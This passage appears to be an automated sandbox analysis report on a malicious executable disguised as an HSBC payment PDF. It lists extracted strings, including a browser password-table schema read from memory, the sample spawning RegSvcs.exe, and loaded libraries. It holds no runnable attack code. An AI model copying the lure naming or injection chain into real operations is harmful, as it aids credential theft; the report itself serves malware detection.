              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: INSERT OR REPLACE INTO branches( content_item_id, content_item_revision_id, branch_name, app_id, is_transient, record_created, modified, download_state) VALUES( :contentItemId, :contentItemRevisionId, :branchName, :appId, :isTransient, :recordCreated, :modified, :downloadState);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: UPDATE content_items SET pending_local_delete = :pendingLocalDelete WHERE( creation_id = :creationId);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: INSERT OR REPLACE INTO content_item_relations( src_content_item_id, target_content_item_id, rel) VALUES( :srcContentItemId, :targetContentItemId, :rel);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: INSERT INTO resource_revisions( revision_id, rel_to_content_item, resource_type, media_type, locator, committed, hashType, hash, storageSize, width, height) VALUES( :revisionId, :relToContentItem, :resourceType, :mediaType, :locator_var, :committed_var, :hashType_var, :hash_var, :storageSize_var, :width_var, :height_var);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS branches ( content_item_id TEXT NOT NULL, content_item_revision_id TEXT NOT NULL, branch_name TEXT NOT NULL, app_id TEXT NOT NULL, is_transient INTEGER DEFAULT 0 NOT NULL, record_created TIMESTAMP NOT NULL, modified TIMESTAMP NOT NULL, download_state TEXT DEFAULT NULL, PRIMARY KEY (content_item_id, branch_name, app_id));
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS content_item_resources ( content_item_revision_id TEXT NOT NULL, resource_revision_id TEXT NOT NULL, resource_id TEXT DEFAULT NULL, resource_cloud_etag TEXT DEFAULT NULL, resource_cloud_version_id TEXT DEFAULT NULL, resource_local_etag TEXT DEFAULT NULL, resource_local_version_id TEXT DEFAULT NULL, PRIMARY KEY (content_item_revision_id, resource_revision_id));
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: INSERT INTO device_mappings( device_mapping_id, content_item_id, collection_id, content_item_type, include_rel_types, include_depth, branch, TTL, Priority, app_info) VALUES( :deviceMappingId, :contentItemId, :collectionId, :contentItemType, :includeRelTypes, :includeDepth, :branch, :TTL, :priority, :appInfo);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: INSERT INTO content_item_resources( content_item_revision_id, resource_revision_id) VALUES( :contentItemRevisionId, :resourceRevisionId);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: INSERT INTO branches ( content_item_id, content_item_revision_id, branch_name, app_id, is_transient, record_created, modified, download_state) VALUES( :contentItemId, :contentItemRevisionId, :branchName, :appId, :isTransient, :recordCreated, :modified, :downloadState);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: UPDATE content_items SET removed_from_server = :removedFromServer WHERE( creation_id = :creationId);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: UPDATE branches SET modified = :modified WHERE( content_item_id = :contentItemId AND branch_name = :branchName AND app_id = :appId);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: SELECT branches.content_item_id FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id) WHERE( branches.app_id = :appId AND branches.branch_name = :branch1 AND branches.content_item_id = :contentItemId AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = :branch2 AND branches.content_item_id = :contentItemId))));
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS resource_revisions ( revision_id TEXT PRIMARY KEY NOT NULL, rel_to_content_item TEXT NOT NULL, resource_type TEXT NOT NULL, media_type TEXT NOT NULL, locator TEXT NOT NULL, committed INTEGER NOT NULL, hashType TEXT DEFAULT NULL, hash TEXT DEFAULT NULL, storageSize INTEGER DEFAULT 0, width INTEGER DEFAULT 0, height INTEGER DEFAULT 0);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: select count(*) from SQLITE_MASTER where type = "table";
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: UPDATE content_items SET pending_local_delete = :pendingLocalDelete WHERE( creation_id = :creationId);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: INSERT INTO content_item_revisions( content_item_revision_id, cloud_etag, updated, local_etag, request_id, content_name) VALUES( :contentIemRevisionId, :cloudEtag, :updated, :localEtag, :requestId, :contentName);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS content_item_revisions( content_item_revision_id TEXT PRIMARY KEY NOT NULL, cloud_etag TEXT DEFAULT NULL, cloud_version_id TEXT DEFAULT NULL, updated TIMESTAMP DEFAULT NULL, acl TEXT DEFAULT NULL, local_etag TEXT DEFAULT NULL, local_version_id TEXT DEFAULT NULL, request_id TEXT DEFAULT NULL, content_name TEXT DEFAULT NULL);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS content_items( creation_id TEXT PRIMARY KEY NOT NULL, asset_id TEXT DEFAULT NULL, type TEXT NOT NULL, content_item_type TEXT NOT NULL, created TEXT NOT NULL, removed_from_server INTEGER DEFAULT 0 NOT NULL, pending_local_delete INTEGER DEFAULT 0 NOT NULL, update_seq_num INTEGER DEFAULT 0 NOT NULL);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS sync_tokens ( content_item_id TEXT PRIMARY KEY NOT NULL, token TEXT DEFAULT NULL, last_sync_time TIMESTAMP DEFAULT NULL, device_mapping_id TEXT DEFAULT NULL);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: UPDATE pending_requests SET request_status = :requestStatus, message = :message, status_code = :statusCode WHERE( pending_request_id = :pendingRequestId);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: SELECT * FROM device_mappings WHERE( content_item_id = :contentItemId);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: INSERT OR REPLACE INTO branches ( content_item_id, content_item_revision_id, app_id, is_transient, record_created, modified, download_state, branch_name) SELECT content_item_id, content_item_revision_id, app_id, is_transient, record_created, modified, download_state, :targetBranchname from branches WHERE branch_name = :srcBranchname AND content_item_id = :contentItemId AND app_id = :appId;
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: SELECT branches.content_item_id FROM content_item_relations JOIN branches ON( branches.content_item_id = content_item_relations.target_content_item_id) JOIN content_items ON( content_items.creation_id = content_item_relations.target_content_item_id) WHERE( content_item_relations.src_content_item_id = :srcContentItemId AND content_item_relations.rel = :relType AND branches.app_id = :appId AND branches.branch_name = :branch1 AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id NOT IN ( SELECT branches.content_item_revision_id FROM content_item_relations JOIN branches ON( branches.content_item_id = content_item_relations.target_content_item_id) WHERE( content_item_relations.src_content_item_id = :srcContentItemId AND content_item_relations.rel = :relType AND branches.app_id = :appId AND branches.branch_name = :branch2))));
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS content_item_relations ( src_content_item_id TEXT NOT NULL, target_content_item_id TEXT NOT NULL, rel TEXT NOT NULL, PRIMARY KEY (src_content_item_id, target_content_item_id, rel));
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: INSERT INTO pending_requests( pending_request_id, request_type, content_item_id, context) VALUES( :pendingRequestId, :requestType, :contentItemId, :context);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: SELECT *, (SELECT resource_content.resource_content FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_resources ON (branches.content_item_revision_id = content_item_resources.content_item_revision_id) JOIN resource_revisions ON (content_item_resources.resource_revision_id = resource_revisions.revision_id) JOIN resource_content ON (resource_revisions.hash = resource_content.resource_content_id) WHERE( branches.content_item_id = creation_id_local AND branches.branch_name = 'error' AND branches.app_id = :appId)) as error_payload, (SELECT 1 from branches where branch_name = 'conflict' AND content_item_id = creation_id_local) as is_conflicted, ( SELECT 1 FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id and branches.content_item_id = creation_id_local) WHERE( branches.app_id = :appId AND branches.branch_name = 'current' AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = 'base'))))) as is_sync_pending FROM ( SELECT content_item_relations.src_content_item_id, branches.download_state, branches.record_created, branches.modified, content_items.creation_id , content_items.creation_id as creation_id_local, branches.content_item_id, content_items.asset_id, content_items.type, content_items.content_item_type, content_items.removed_from_server, content_items.pending_local_delete, content_item_revisions.cloud_etag, content_item_revisions.updated, content_item_revisions.local_etag, content_item_revisions.request_id, content_item_revisions.content_name, content_item_resources.resource_cloud_etag , content_item_resources.resource_local_etag , resource_revisions.rel_to_content_item , resource_revisions.resource_type, resource_revisions.committed, resource_content.resource_content FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) JOIN content_item_resources
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: UPDATE content_item_revisions SET local_etag = :localEtag, request_id = :requestId, updated = :updated WHERE( content_item_revision_id IN ( SELECT content_item_revision_id FROM branches WHERE( content_item_id = :contentItemId AND branch_name = :branchName ANDapp_id = :appId)));
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests WHERE( request_type = :requestType and content_item_id = :contentItemId);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: UPDATE device_mappings SET unPinned = 1 WHERE(content_item_id = :contentItemId);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS pending_requests ( pending_request_id TEXT PRIMARY KEY NOT NULL, request_type TEXT NOT NULL, content_item_id TEXT DEFAULT NULL, context TEXT DEFAULT NULL, pending_request_created TIMESTAMP DEFAULT (strftime('%Y-%m-%dT%H:%M:%SZ', 'now', 'localtime')) NOT NULL, request_status TEXT DEFAULT "CREATED" NOT NULL, message TEXT DEFAULT NULL, status_code INTEGER DEFAULT -1 NOT NULL, device_mapping_id TEXT DEFAULT NULL, UNIQUE (content_item_id, request_type, request_status));
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: SELECT content_item_revisions.cloud_etag FROM content_items JOIN branches ON (branches.content_item_id = content_items.creation_id)JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id)WHERE( content_items.asset_id = :assetId AND branches.branch_name = :branchName AND branches.app_id = :appId);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: SELECT content_items.creation_id FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) WHERE (branches.branch_name = 'current' AND branches.app_id = :appid) AND ((content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR (content_item_revisions.content_item_revision_id) NOT IN ( SELECT content_item_revisions.content_item_revision_id FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) WHERE (branches.branch_name = 'base' AND branches.app_id = :appid))) AND content_items.creation_id NOT IN ( SELECT content_item_id FROM branches WHERE( branch_name = 'error'));
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: SELECT creation_id FROM content_items WHERE asset_id = :assetId;
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: SELECT * FROM device_mappings WHERE( unPinned = 1);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: SELECT content_item_relations.src_content_item_id, branches.download_state, content_items.creation_id,branches.content_item_id,branches.record_created, branches.modified, content_items.asset_id, content_items.type, content_items.content_item_type, content_items.removed_from_server, content_items.pending_local_delete, content_item_revisions.cloud_etag, content_item_revisions.updated, content_item_revisions.local_etag, content_item_revisions.request_id, content_item_revisions.content_name, content_item_resources.resource_cloud_etag , content_item_resources.resource_local_etag , resource_revisions.rel_to_content_item , resource_revisions.resource_type, resource_revisions.committed, resource_content.resource_content, (select 1 from branches where branch_name = 'conflict' AND content_item_id = :id) as is_conflicted, (SELECT 1 FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id) WHERE( branches.app_id = :appId AND branches.branch_name = 'current' AND branches.content_item_id = :id AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = 'base' AND branches.content_item_id = :id))))) as is_sync_pending, (SELECT content_item_revisions.cloud_etag FROM content_items JOIN branches ON (branches.content_item_id = content_items.creation_id)JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id)WHERE( content_items.asset_id = :collectionId AND branches.branch_name = :branchName AND branches.app_id = :appId)) as collection_cloud_etag FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) JOIN content_item_resources ON (branches.content_item_revision_id = content_item_resources.content_item_revision_id) JOIN resource_revisions ON (content_item_resources.resource_revision_id = resource_revisions.revision_id) JOIN content_item_rel
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT * FROM device_mappings WHERE( content_item_type = :resourceType);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS content_item_updates ( seq_num INTEGER PRIMARY KEY NOT NULL, app_id TEXT NOT NULL, content_item_local_id TEXT NOT NULL, time TIMESTAMP NOT NULL, operation TEXT NOT NULL);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: UPDATE content_items SET asset_id = :assetId WHERE( creation_id = :creationId);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS device_mappings ( device_mapping_id TEXT PRIMARY KEY NOT NULL, content_item_id TEXT NOT NULL, content_item_type TEXT NOT NULL, include_rel_types TEXT DEFAULT NULL, include_depth INTEGER DEFAULT 0 NOT NULL, branch TEXT DEFAULT NULL, device_mapping_created TIMESTAMP DEFAULT (strftime('%s', 'now')) NOT NULL, collection_id TEXT DEFAULT NULL, TTL INTEGER DEFAULT 0 NOT NULL, Priority INTEGER DEFAULT 0 NOT NULL, app_info TEXT NOT NULL, unPinned INTEGER DEFAULT 0 NOT NULL, UNIQUE (content_item_id, branch));
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests;
              Source: AdobeCollabSync.exe.4.drBinary or memory string: INSERT INTO resource_content( resource_content_id, resource_content) VALUES ( :resourceContentId, :resourceContent);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT *FROM pending_requests WHERE(content_item_id = :contentItemId);
              Source: RegSvcs.exe, 00000005.00000002.2636185001.0000000002835000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.0000000002844000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.0000000002865000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2642739426.000000000376D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.0000000002826000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeReversingLabs: Detection: 78%
              Source: unknownProcess created: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
              Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
              Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
              Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
              Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
              Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
              Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
              Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
              Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
              Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
              Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
              Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
              Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
              Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Section loaded: webio.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: mpr.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: secur32.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: webio.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: mpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: secur32.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: msdtctm.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: msdtcprx.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: msdtclog.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: mtxclu.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: winmm.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: xolehlp.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: mtxclu.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: comres.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: msdtcvsp1res.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: mtxoci.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: oci.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: netutils.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\msdtc.exe Section loaded: firewallapi.dll
